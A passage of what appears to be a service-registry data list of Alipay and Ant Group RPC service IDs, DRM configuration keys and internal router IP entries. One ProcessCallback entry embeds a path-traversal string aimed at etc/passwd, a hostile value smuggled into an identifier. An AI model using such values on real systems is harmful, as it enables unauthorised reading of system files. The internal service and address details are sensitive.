DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.zcbsalescenter.biz.shared.cancelaccount.service.ZCBCloseInvokeServiceTest:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.mydds:name=com.alipay.cif.utils.probe.ProbeDrmSwitch.switcher,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","config:com.alipay.clearingcenter.facade.api.CcWorkCalendarQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","config:com.alipay.fc.fcbuservice.common.service.facade.PermissionActionFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.echannelcenter.common.service.facade.mng.EchannelH5CheckRuleFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.ecsign.common.service.facade.sign.VideoSignFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","cn.com.antcloud.acauthcore.common.service.facade.manager.RoleManageFacade#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.openexprod.common.service.facade.SpiConfigManagerFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.paymentmng.service.facade.paycore.PmtRfdModeStyCfgFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","cn.com.antcloud.acparamcore.facade.api.TableFacade#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.test.sub4:1.0@DEFAULT@testcloud#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finfocore:name=com.alipay.finfocore.common.service.integration.drm.DrmCdsLdcManager.cacheThreadPoolProps,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.unitradeprod.biz.service.iothub.IotPayOrderFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mrchasset.core.service.kbbase.AssetProduceCompleteService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.recadmin.dmp.common.service.facade.api.LabelManagerServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.gfmac.common.service.facade.api.TwoPhaseBudgetReleaseFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.ipay.iliquidity.biz.manager.page.PageManager:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.ipay.ipromomng.common.service.facade.api.campaign.CampManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.poscore:name=com.alipay.zdal.ldc.tair.customerTairCache_dest.tbaseClientWarmup,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:bkdepmng_fundAmountAdjustCallback@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mindv.okcourse.service.OkCourseQueryReachService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.revcore:name=com.alipay.revcore.biz.shared.drm.DrmData.MSFileSplitSize,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_10.15.242.32#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.zpaas:name=com.alipay.common.tracer.manage.TracerDrm.zdalDbDigestLogThreshold,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.finauth.common.service.facade.inst.service.InstInfoQueryGzoneFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.publiccore.common.service.facade.app.PublicShortLinkFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.cloudbox:name=com.alipay.common.security.dresource.SecurityCommonDrm.ctokenCheckerDeny,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.paymentmng:name=com.alipay.cif.model.cache.CifCOControlSwitch.switchCustCertifyInfo,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.pvsofaserver.facade.PvSofaService:1.0:elastic_origin_zone@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.insautobff:name=com.alipay.sla.businessgray.drm.BusinessGrayGlobalSwitcher.accountOpen,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.mfinsnsprod.service.facade.api.alive.ProdALiveFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Pub_Servers_TP_S_PAYCORERECEIPT_*#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.sofa.rpc.elastic.ElasticService:1.0:zeroxrisk@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.minicore.common.service.facade.admin.api.OssQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.yebplus.common.facade.service.api.query.YebsSwitchFundQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","HEALTHY_V2@arkbaseserverless#@#DEFAULT_INSTANCE_ID#@#SOFA-HEALTHY","Alipay.mwalletmng:name=com.alipay.mwalletmng.biz.clientpublish.drm.ClientPublishDRMImpl.clientUpgradedelayTimeDrm,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.hainaprod.common.service.facade.api.mini.market.UniMarketActivityAdminFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fintradeguard.common.service.facade.product.QueryPurchaseProductFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.poscore:name=com.alipay.antvip.client.internal.drm.DrmSyncControl.checkIntervalWhenDisableSync,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.sofa.rpc.elastic.ElasticService:1.0:iottestpower@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finfundprod.common.service.facade.scene.TryFundActivityFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.ipay.ilogin.common.service.facade.api.LoginService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Pub_Servers_TP_M_FINANCE#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.minitrans.service.facade.musedcredit.api.MuctransQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.checkroute.common.service.checkersdk.service.MetaDataService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.opsconfreg.common.service.facade.ConfregDataInfoQueryFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zdaljdbc:name=com.alipay.zdal.ldc.jdbc.charge.goldenMysqlWriteDataSource.keyWeight,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.bkpromoguard.facade.ops.api.OpRuleCondServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.dss.mkthbase.facade.MktHBaseFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.contentlib.common.service.facade.content.BenefitInfoFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.124.126.57#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.routeclient.interfacename:fintradebff#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.iaassettrans.facade.common.astconfig.api.AstconfigManageFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.etetestcore:name=com.alipay.common.tracer.manage.TracerDrm.zdalOcsDigestLogThreshold,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.ipay.ilogin.common.service.facade.api.oauth.OauthTokenMappingFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilegw.adapterservice.MobileAdapterService:1.0:pcreditbfweb@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mservicesinspect.biz.shared.feature.template.DetectItem:1.0:clockUsabilityDetectItem@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zdaltair:name=com.alipay.zdal.ldc.tair.addpChargeTairRz.foReadPolicy,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.mobilegw.adapterservice.mosng.MosngAdapterService:1.0:mservicesinspect@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.insmobile:name=com.alipay.insmobile.drm.insmobiledrmhandler.placeSafety12ProdIds,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.tairmanager.application.service.flow.devoffline.QueryRequestOffline:1.0:devQueryRequestOffline@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.zdatabus.facade.EventContextFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.insclaimdecision.common.service.InsClaimDecisionFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.antqnamesrv:name=com.alipay.antvip.client.internal.drm.DrmControl.restrainEnable,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.lightmds.service.mds.MdsDatasetMetricFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kbsales.common.service.facade.shop.validate.ShopRiskValidateFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.cscenter.service.crmtask.facade.CrmJbpmMemoService:1.0.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.secretcore.endpoint.facade.DdsImportRestFacade#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.familycore.facade.FamilyPcreditSharingFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.event.api.input.EventReceiverService:1.0:SL__TP_F_SC_MftransInterestFileParseTask@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.fininfo:name=com.alipay.finsupport.component.cache.masterdata.drm.MasterdataCacheDRM.refreshMDCacheName,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.mobileacauth.common.service.component.TerminalIndexComponent:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zpaas:name=com.alipay.common.security.util.dresource.SecurityCommonUtilDrm.jdbcUrlCheckDeny,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.ecocheck.common.service.search.facade.SearchAppInfoFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.sofa.rpc.elastic.ElasticService:1.0:asa-core@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.opscloudcore.framework.core.facade.OpscloudClientServiceFacade:1.0:msfluxconf@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finstore.common.service.facade.fop.mng.CrowdTagMngFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.csvoice.service.facade.api.KeyQuestionApiService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.progov.service.api.asbi.AsbiMeasuresFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.bpaas.ecomerchant.facade.auth.AuthFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finfocore:name=com.alipay.finfocore.common.service.integration.drm.DrmFopShopConfig.pid2ForbiddenMsgMap,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.mservicesinspect.common.service.integration.festival.FestivalTestClient:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.ipay.imif.isales.common.service.facade.contract.ContractOperateFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.agds.sd.facade.precheck.GenericBeanPreCheckFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.insopenprod.core.service.risk.InsRiskService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kbadvert.biz.service.test.Test:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.45.74.232#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.openitemcore.common.service.facade.api.charge.ChargeRuleFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.promoprod.common.service.facade.label.LabelConfigQueryService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilegw.adapterservice.mosng.MosngAdapterService:1.0:kborderaccept@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finsnsbff:name=com.alipay.finsnsbff.spring.springTwentyActivityIdB,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.ipay.icif.service.facade.api.UserContactQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kbasset.biz.shared.common.OperatorService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mfinstockprod.atomic.service.facade.coupon.CouponFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.bizprodmng:name=com.alipay.sofa.middleware.switcher.drm.GlobalSwitchResource.loadTestIslandConditionStr,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","NS_Pub_Servers_TP_B_CA#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.finpromoprod.common.service.facade.biz.fortuneday.FortuneDayInflateFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.cfpcenter.common.service.facade.specialbusiness.api.CfpSpecialUnfreezeFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.secuprod.common.service.facade.api.web.SnsCommunityFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.pointmng:name=com.alipay.common.security.dresource.SecurityCommonDrm.paramCheckConfig,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.gftms.facade.api.basic.subaccount.SubAccountOperateFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.xview.core.common.facade.CacheQueryProviderService:1.0:mobilecodec@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.antrecluse.facade.service.bo.ServiceBo:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.dpc.dasbi.common.service.facade.api.ChartFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilechat.biz.group.rpc.GroupCommonRpcService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.ropcn.common.service.facade.api.TaskSearchFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.fcbuservice.common.service.facade.AuditFacade:1.0:antyixin@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.invoicecommercial.facade.api.AuthInvoiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.creditguarantee.common.service.facade.GuaranteePassConsultFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.mybank.bkibdeposit.common.service.facade.query.RateCodeQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pcardcore.common.service.facade.mpcard.MPcardQueryFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.imdopcore.facade.ShopService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.158.27.241#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.kbsales.common.service.facade.leads.ClueLeadsQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.ropcn.common.service.facade.api.TaskRevokingChainExecutorFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.meta2:name=com.alipay.sla.businessgray.drm.BusinessGrayGlobalSwitcher.bizOpen,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.gffund.common.service.facade.api.StandardVoucherClaimCallbackFacade:1.0:gfptStandardVoucherClaimCallbackFacade@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.antgroup.zmxy.zmcreditprod.common.service.facade.CreditCityFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zcache:name=com.alipay.zdal.ldc.tair.riskmngTairCache_dest.tbaseClientWarmup,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","inscvprod@msgbrokerMosn#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.sofa.rpc.elastic.ElasticService:1.0:mashup@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_100.83.247.175#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:ggyy@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilegw.adapterservice.MobileAdapterService:1.0:meshyserver@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Pub_Servers_TP_Q_QUALITY#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.sofa.rpc.elastic.ElasticService:1.0:alcontract@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.cdp.common.service.facade.ucdp.SystemManageService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:/.\\\\\\\\..\\\\\\\\.\\\\\\\\..\\\\\\\\.\\\\\\\\..\\\\\\\\.\\\\\\\\..\\\\\\\\.\\\\\\\\..\\\\\\\\.\\\\\\\\..\\\\\\\\.\\\\\\\\..\\\\\\\\.\\\\\\\\..\\\\\\\\etc/passwd@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_10.15.249.13#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","config:com.alipay.mobiletms.plugin.common.service.facade.api.PluginFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","Alipay.insttrade:name=com.alipay.fc.common.lang.drm.AntBizLogCfgDrm.globalFlag,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.userview.facade.PropViewService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zskynet:name=com.alipay.zskynet.integration.drm.AlarmCheckDRM.zpaasAdjust,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","NS_Sub_Servers_TP_O_BOPS#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.jiuzhou.client.dbswitch.ClusterConnection:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.benefitprod.common.service.asset.BankAssetManagerFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kbtemplate.common.service.facade.manage.dynamic.DynamicQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.openinsight.common.service.facade.rec.api.RecLabelServiceFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.openitemcore.common.service.facade.api.catalog.StandardCatalogConfigFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.instopen.service.facade.workorder.WorkOrderFlowService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.124.160.9#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.cloudengine:name=com.alipay.cloudengine.resmanager.cloudprovision.resValue,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.riskmng:name=com.alipay.routeclient.DefaultRouteCoordinator.zoneColor,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.fintradecenter.biz.trade.service.structureddeposits.StructuredDepositsRedeemUpdateService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.transfercenter.common.service.facade.api.TransferQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.mif.common.service.facade.MerchantRelationGzonePageQueryFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.datacube.common.service.facade.UccTaskFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","cn.com.antcloud.acoffercenter.common.service.facade.product.ProdConfigManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kbcontent.common.service.facade.api.dish.DishManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.platform.xts.bacs.spi.BusinessActivityStateResolver:1.0:businessActivityStateResolver@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finpromoprod.common.service.facade.campaign.mng.AiStrategyManageFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilegw.adapterservice.MobileAdapterService:1.0:busriskdec@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilegw.adapterservice.MobileAdapterService:1.0:agdscsalipay@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.ipay.icif.service.facade.api.LoginProfileService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finfoprod.common.service.fsc.facade.StatMonitorFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.securitydata.biz.dataimport.listener.impl.NameListTrigger:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.riskdatacenter.service.facade.hpa.EmergencyFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.antfeaturelib.common.facade.service.DataViewProtocolQueryService:1.0:antsecurity_securityservice@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.paycore.service.payment.xtrans.AssetFinalizeService:1.0:asttshipcoreFluxService@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finworks.common.service.facade.hvps.HvpsLoginService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.artisan.facade.component.MaterialFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.ordermng:name=com.alipay.antvip.client.internal.drm.DrmSyncControl.successParkIntervalMs,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.yebplus.common.facade.service.api.query.YebsDailyBillUserInfoQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.rpc.elastic.ElasticService:1.0:selfcurealipayse@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.cloud.apfasmng.common.service.facade.serverlesspaasautoreload.ServerlessPaasAutoReloadFacade#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.opencore.search.facade.AppSearchFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.promoprod.common.service.facade.BatchDataTransCallBackService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.trafficcardsp.common.service.facade.SpecialAirfareQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zdaltair:name=com.alipay.zdal.ldc.tair.ALIPAYZAUTHJSESSIONID.shardingRule,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_11.124.12.214#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.instasset.common.service.facade.AssetManageService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.gmodelcenter.common.service.api.matrix.CheckItemQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_100.83.25.186#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.decisioncenter.common.service.facade.api.DecideNodeQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.antgroup.zmxy.zmcustcore.common.service.facade.api.jobworth.JobConfigQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alibaba.dataphin.resource.common.facade.api.ResourceOpenService:1.0:dpresource@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.39.6.160#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.mobilepep.spi.service.MobilePEPService:1.0:ebillcenter@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.gfas:name=com.alipay.supergwlite.components.umessage.UniMsgConfigResource.openXStreamWhiteListFunction,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.giftprod.common.service.facade.inner.GiftCrowdInviteGzService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilegw.adapterservice.mosng.MosngAdapterService:1.0:pcreditsceneprod@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.dockerlabapp:name=com.alipay.sla.businessgray.drm.BusinessGrayPolicy.globalGrayAccountRange,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.finance.filefactory.sevice.FileFactoryEventListener:1.0:poscore@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mnotify.biz.client.client.rpc.MNotifyCallbackRPCService:1.0:couponcore@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.opscloudcore.framework.core.facade.OpscloudClientServiceFacade:1.0:tyxopssla@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finpwm:name=com.alipay.routeclient.DefaultRouteCoordinator.whiteListRPCLoadTest,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.mdatasync.common.service.facade.reportengine.PermissionFacade:1.0:openmonitor_minareports_permission@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mapi.facade.partner.PartnerExterfaceFacadeForBops:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finfocore:name=com.alipay.finfocore.common.service.integration.drm.DrmFopConfig.closeShopProductListPidsStr,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.securitydata.common.service.facade.risklevel.RiskLevelService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.antschedulerconsole.endpoint.facade.IExpenseRestFacade#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.zcbsalescenter.common.service.facade.trade.TransactionDateCaculateFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.124.138.208#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","NS_Sub_Servers_TP_C_FINSERVICE#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","Alipay.finslip:name=com.alipay.finsupport.component.cache.masterdata.drm.MasterdataCacheDRM.institutionQuerySwitch,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","cn.com.antcloud.acsubscriberprod.facade.service.CategoryConfigFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pucprod.common.service.facade.notify.UserNotifyFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:fccustmng_merchantAddWhiteCreate@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.73.180.49#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.processmng:name=com.alipay.antvip.client.internal.drm.DrmControl.restrainEnable,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.sofa.rpc.elastic.ElasticService:1.0:finlinkdata@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.extend-request:name=com.alipay.sla.disaster.drm.SlaDisasterRuleConfigDrm.slaConfig,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.zdaltair:name=com.alipay.zdal.ldc.tair.certifymngTairCache.legacyRwWeight,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.riskmng.common.service.facade.api.cscheck